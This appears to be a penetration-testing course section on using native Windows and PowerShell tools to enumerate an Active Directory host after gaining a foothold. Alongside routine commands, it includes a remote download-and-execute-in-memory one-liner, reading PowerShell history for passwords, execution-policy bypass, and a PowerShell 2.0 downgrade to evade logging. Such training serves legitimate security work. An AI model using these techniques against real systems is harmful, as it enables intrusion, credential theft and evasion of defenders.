This section teaches how to use built-in Windows tools to gather information about an Active Directory environment, either from a foothold host or an attack host, without needing to upload extra tools. You'll practice these techniques using the native tools available in Windows.
| Command | Result |
|---|---|
hostname |
Prints the PC's Name |
[System.Environment]::OSVersion.Version |
Prints out the OS version and revision level |
wmic qfe get Caption,Description,HotFixID,InstalledOn |
Prints the patches and hotfixes applied to the host |
ipconfig /all |
Prints out network adapter state and configurations |
set |
Displays a list of environment variables for the current session (ran from CMD-prompt) |
echo %USERDOMAIN% |
Displays the domain name to which the host belongs (ran from CMD-prompt) |
echo %logonserver% |
Prints out the name of the Domain controller the host checks in with (ran from CMD-prompt) |
systeminfo
PowerShell has many built-in functions and modules we can use on an engagement to recon the host and network and send and receive files.
Let's look at a few of the ways PowerShell can help us.
| Cmd-Let | Description |
|---|---|
Get-Module |
Lists available modules loaded for use. |
Get-ExecutionPolicy -List |
Will print the execution policy settings for each scope on a host. |
Set-ExecutionPolicy Bypass -Scope Process |
This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host. |
| `Get-ChildItem Env: | ft Key,Value` |
Get-Content $env:APPDATA\\Microsoft\\Windows\\Powershell\\PSReadline\\ConsoleHost_history.txt |
With this string, we can get the specified user's PowerShell history. This can be quite helpful as the command history may contain passwords or point us towards configuration files or scripts that contain passwords. |
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>" |
This is a quick and easy way to download a file from the web using PowerShell and call it from memory. |
Older versions of PowerShell (like 2.0) can be used to avoid event logging, helping attackers remain undetected while using built-in system resources. This technique takes advantage of the fact that PowerShell 3.0 and later have event logging enabled.
Get-host
powershell.exe -version 2
Get-host
get-module
The next few commands utilize the netsh and sc utilities to help us get a feel for the state of the host when it comes to Windows Firewall settings and to check the status of Windows Defender.
Firewall Checks
netsh advfirewall show allprofiles
# Using CMD
sc query windefend
Get-MpComputerStatus
Knowing what revision our AV settings are at and what settings are enabled/disabled can greatly benefit us. We can tell how often scans are run, if the on-demand threat alerting is active, and more.